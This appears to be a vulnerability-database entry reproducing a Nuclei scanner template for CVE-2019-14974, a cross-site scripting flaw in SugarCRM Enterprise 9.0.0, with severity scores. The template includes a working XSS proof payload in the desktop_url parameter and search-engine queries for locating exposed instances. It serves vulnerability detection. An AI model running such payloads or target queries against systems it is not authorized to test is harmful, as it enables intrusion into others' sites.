Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2019-14974
HistoryApr 08, 2020 - 12:49 p.m.

SugarCRM Enterprise 9.0.0 - Cross-Site Scripting

2020-04-0812:49:45
ProjectDiscovery
github.com
7

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.002 Low

EPSS

Percentile

54.7%

SugarCRM Enterprise 9.0.0 contains a cross-site scripting vulnerability via mobile/error-not-supported-platform.html?desktop_url.

id: CVE-2019-14974

info:
  name: SugarCRM Enterprise 9.0.0 - Cross-Site Scripting
  author: madrobot
  severity: medium
  description: SugarCRM Enterprise 9.0.0 contains a cross-site scripting vulnerability via mobile/error-not-supported-platform.html?desktop_url.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Apply the latest security patch or upgrade to a non-vulnerable version of SugarCRM Enterprise.
  reference:
    - https://www.exploit-db.com/exploits/47247
    - https://nvd.nist.gov/vuln/detail/CVE-2019-14974
    - https://github.com/anonymous364872/Rapier_Tool
    - https://github.com/merlinepedra/nuclei-templates
    - https://github.com/merlinepedra25/nuclei-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2019-14974
    cwe-id: CWE-79
    epss-score: 0.00173
    epss-percentile: 0.54331
    cpe: cpe:2.3:a:sugarcrm:sugarcrm:9.0.0:*:*:*:enterprise:*:*:*
  metadata:
    max-request: 1
    vendor: sugarcrm
    product: sugarcrm
    shodan-query:
      - http.html:"sugarcrm inc. all rights reserved"
      - http.title:sugarcrm
    fofa-query:
      - body="sugarcrm inc. all rights reserved"
      - title=sugarcrm
    google-query:
      - intitle:sugarcrm
      - intext:"sugarcrm inc. all rights reserved"
  tags: cve,cve2019,xss,sugarcrm,edb

http:
  - method: GET
    path:
      - "{{BaseURL}}/mobile/error-not-supported-platform.html?desktop_url=javascript:alert(1337);//itms://"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "url = window.location.search.split(\"?desktop_url=\")[1]"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100d611a030c5eaad133b5dbca934bf65224a7d94eb1685c03a81918fa5583ea3840221008519c5c7f8670e1c42364956432400898776eb5b1213d31a0016c2de483ac012:922c64590222798bb761d5b6d8e72950

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.002 Low

EPSS

Percentile

54.7%

Related for NUCLEI:CVE-2019-14974